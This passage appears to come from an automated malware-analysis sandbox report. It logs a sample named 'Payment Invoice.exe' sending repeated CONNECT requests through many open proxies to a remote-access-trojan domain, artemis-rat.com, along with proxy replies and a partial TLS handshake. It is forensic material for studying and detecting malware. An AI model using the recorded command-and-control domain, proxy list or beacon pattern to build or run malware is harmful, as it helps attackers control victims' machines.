                                                                272192.168.2.44987198.162.25.29316797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.237968922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                273192.168.2.45094147.88.3.1980807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.240808010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.789992094 CET309INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.23.4
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 157
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.4</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                274192.168.2.450805134.209.29.12031287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.241130114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.534910917 CET28INHTTP/1.1 400 Bad Request


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                275192.168.2.45075435.199.90.22588887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.245381117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:53.679486990 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                276192.168.2.45089367.43.227.227100497076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.249594927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                277192.168.2.45106747.236.85.1134437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.253974915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                278192.168.2.45107047.236.85.1134437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.255501032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                279192.168.2.45107547.236.85.1134437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.257186890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                280192.168.2.45107947.236.85.1134437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.261828899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                281192.168.2.450860174.77.111.19741457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.263072968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                282192.168.2.450791135.181.102.11871177076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.269300938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.108567953 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                283192.168.2.450315117.160.250.163827076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.269843102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.683073044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.422943115 CET221INHTTP/1.1 403 Access Denied
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Connection: close
                                                                Cache-Control: no-store
                                                                Content-Type: text/html
                                                                Content-Language: en
                                                                Content-Length: 43
                                                                Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                Data Ascii: You are not allowed to access the document.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                284192.168.2.450977198.23.229.203156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.274662971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                285192.168.2.45083689.31.143.12807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.277297020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.590995073 CET307INHTTP/1.1 400 Bad Request
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 150
                                                                Connection: close
                                                                Server: UD Forwarding 3.1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                286192.168.2.450991104.16.104.12807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.281550884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.435578108 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                287192.168.2.450999172.67.182.96807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.281644106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.435899973 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                288192.168.2.45101045.12.30.231807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.282896996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.437196016 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                289192.168.2.45091345.196.148.6754327076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.283960104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.500803947 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                Server: FaaS v1.3-20220203-7fa38bd5af
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 65
                                                                Proxy-Authenticate: Basic realm="Proxy"
                                                                Connection: close
                                                                Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                290192.168.2.449947104.238.111.107458837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.286104918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.386205912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.480251074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                291192.168.2.45079645.11.95.16660057076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.286206007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.637207031 CET228INHTTP/1.0 502 Bad Gateway
                                                                Connection: close
                                                                Content-type: text/html; charset=utf-8
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                292192.168.2.45095667.43.236.20200017076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.297749043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.510835886 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                293192.168.2.45102366.225.246.23880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.303541899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                294192.168.2.45086952.67.10.183807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.305821896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.631756067 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0
                                                                Mar 11, 2024 16:15:15.632164955 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 02 8b 41 f0 1e 65 aa 7c b2 c1 5b 3c 4d 7b 18 c1 fe 69 05 b4 6a c8 4d 9c 75 fb ed e0 0a 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: e Ae|[<M{ijMu*,+0/$#('=<5/Uartemis-rat.com#
                                                                Mar 11, 2024 16:15:15.958161116 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 3b 21 b0 89 d1 6b 43 b8 80 2e 66 af 3c 6a 5d 56 f7 19 81 84 df 69 11 ba 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                Data Ascii: =9;!kC.f<j]ViDOWNGRD0000*H010Uartemis-rat.com0240311145335Z260311145335Z010Uartemis-rat.com0"0*H0t71MAQ
                                                                Mar 11, 2024 16:15:16.193269014 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 08 6b fe cd 9d 83 ae 52 d6 b3 48 1d aa 6d 74 96 19 a5 9f 59 cb 5d 9c c8 f1 d3 f1 2e 7e c0 9a 4f 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 b0 0a 65 10 17 97 17 3a b9 7d 85 ab 03 e8 64 12 50 cb c1 cd c6
                                                                Data Ascii: %! kRHmtY].~O(e:}dP!<|%4
                                                                Mar 11, 2024 16:15:16.518726110 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 98 f3 2b 74 75 c0 94 e5 80 99 17 f7 ed e7 df cd 71 f8 10 cc b2 8d 5d d0 ff 0a 51 e9 c6 66 00 6c 16 9f f8 82 ce 67 a2 4a
                                                                Data Ascii: (+tuq]QflgJ


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                295192.168.2.45079291.241.217.5890907076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.307926893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                296192.168.2.450972174.138.114.226807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.316056013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.870454073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.589359045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.027744055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.011576891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.011522055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.027271986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.714487076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.120547056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                297192.168.2.449907184.178.172.1441457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.319484949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                298192.168.2.45077865.1.244.232807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.321346045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.705764055 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0
